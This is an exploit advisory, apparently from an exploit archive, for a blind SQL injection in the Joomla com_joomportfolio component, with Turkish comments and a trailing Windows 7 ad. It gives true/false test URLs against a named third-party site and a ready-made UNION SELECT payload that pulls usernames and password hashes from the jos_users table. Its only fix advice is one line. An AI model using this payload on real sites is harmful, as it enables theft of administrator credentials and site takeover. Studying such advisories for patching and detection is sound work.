The Joomla Portfolio component suffers from a remote blind SQL injection vulnerability.
25e3c18727003bc970b1f62c53b6213ced940fdb5429f1d892acd84aab1725f8
<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_joomportfolio Blind SQL Injection Vulnerability
#############################################################
# author : Fl0riX
# Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske
# Name : com_joomportfolio
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri alýnabilir.
# Demo Vuln. :
TRUE(+)
» http://www.kvalis.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1 and 1=1
FALSE(-)
» http://www.kvalis.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1 and 1=0
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/
< -- bug code end of -- >
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarý bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop